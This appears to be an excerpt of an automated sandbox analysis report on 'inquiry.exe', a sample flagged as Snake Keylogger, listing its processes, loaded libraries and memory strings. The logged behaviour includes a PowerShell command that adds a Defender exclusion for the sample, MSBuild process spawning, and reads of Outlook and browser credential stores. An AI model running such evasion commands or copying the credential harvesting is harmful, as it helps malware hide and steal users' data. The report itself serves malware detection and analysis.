                    Source: 00000002.00000002.1512122215.000001F810011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: inquiry.exe PID: 7340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: MSBuild.exe PID: 7860, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: inquiry.exe, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.inquiry.exe.1f81013a340.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 2.2.inquiry.exe.1f8100554c0.1.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/10@5/4
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7340
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p01ppd1y.4mi.ps1Jump to behavior
                    Source: inquiry.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: inquiry.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                    Source: C:\Users\user\Desktop\inquiry.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: MSBuild.exe, 0000000A.00000002.3761177777.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002BAC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000A.00000002.3761177777.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: inquiry.exeReversingLabs: Detection: 36%
                    Source: C:\Users\user\Desktop\inquiry.exeFile read: C:\Users\user\Desktop\inquiry.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\inquiry.exe "C:\Users\user\Desktop\inquiry.exe"
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -Force
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7340 -s 1312
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\inquiry.exe" -ForceJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\inquiry.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: inquiry.exeStatic file information: File size 1399327 > 1048576
                    Source: inquiry.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: System.Windows.Forms.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: mscorlib.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Windows.Forms.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Drawing.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Drawing.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Core.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.pdbmscorlib.dll source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: System.Core.ni.pdb source: WER355F.tmp.dmp.15.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER355F.tmp.dmp.15.dr
                    Source: C:\Users\user\Desktop\inquiry.exeCode function: 2_2_00007FFAACCD0001 push esp; retf 4810h2_2_00007FFAACCD0312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_010307AD push edi; retf 0000h10_2_010307CA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_010307D9 push edi; retf 0000h10_2_010307DA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_010307E0 push edi; retf 0000h10_2_010307EA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0103891E pushad ; iretd 10_2_0103891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01038DDF push esp; iretd 10_2_01038DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_01038C2F pushfd ; iretd 10_2_01038C30

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\inquiry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
